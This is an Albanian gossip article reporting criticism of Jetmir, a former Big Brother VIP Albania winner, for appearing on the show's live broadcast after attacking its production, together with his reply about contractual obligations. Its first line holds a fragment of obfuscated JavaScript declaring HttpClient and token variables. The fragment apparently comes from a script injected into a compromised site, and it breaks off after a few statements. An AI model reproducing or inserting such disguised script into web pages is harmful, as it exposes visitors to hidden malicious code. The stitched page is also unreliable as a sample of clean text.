;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kritikohet për hipokrizi, Jetmiri, i ‘detyruar’ për të qenë në prime?

By

Doli nga Big Brother larg pritshmërive me të cilat hyri, siç ka ndodhur jo vetëm me të por edhe me plot banorë të tjerë të këtij sezoni të BBV Albania.

Jetmiri, ish-fituesi i edicionit të tretë pati shumë kritika ndaj produksionit e edhe më shumë prej tyre paralajmëroi që do t’i thotë pas daljes.

Megjithatë, shumëkush u habit dje kur e pa të ulur në “prime” krah të eliminuarve të tjerë.

Kjo nga një pjesë e publikut u pa si hipokrizi pas të gjithë akuzave për padrejtësi kundrejt tij.

I gjendur mes shumë komenteve të tilla, ai është detyruar të reagojë duke lënë të nënkuptohet se ka qenë i detyruar nga kontrata të bëj një gjë të tillë.

“Për të gjithë injorantët e trimat. Një kontratë është një kontratë e duhet respektuar. Ata që bëjnë thirrje për të kundërtën ose nuk më duan të mirën ose u intereson të shpifin e denigrojnë imazhin tim në publik”, është shprehur ai në një postim të bërë.

Duket se Jetmiri po i shmanget me stil bankave të gjykatës, ndryshe nga Olsi Bylyku që mori thirrje për senacë në një rast të hapur ndaj tij nga Top Channel për prishje imazhi. /Prive.al

Artikuj të ngjashëm